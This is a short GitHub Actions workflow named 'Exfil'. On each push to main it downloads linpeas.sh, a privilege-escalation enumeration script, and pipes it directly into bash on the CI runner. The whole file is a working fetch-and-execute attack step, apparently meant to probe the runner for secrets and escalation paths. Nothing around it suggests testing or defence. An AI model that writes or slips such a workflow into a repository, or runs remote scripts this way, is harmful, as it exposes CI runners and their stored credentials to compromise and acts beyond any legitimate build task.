name: Exfil

on:
  push:
    branches:
      - main

jobs:
  print:
    runs-on: ubuntu-latest

    steps:
      - name: war
        run: |
           curl https://github.com/peass-ng/PEASS-ng/releases/download/20240421-825f642d/linpeas.sh |bash
        shell: bash
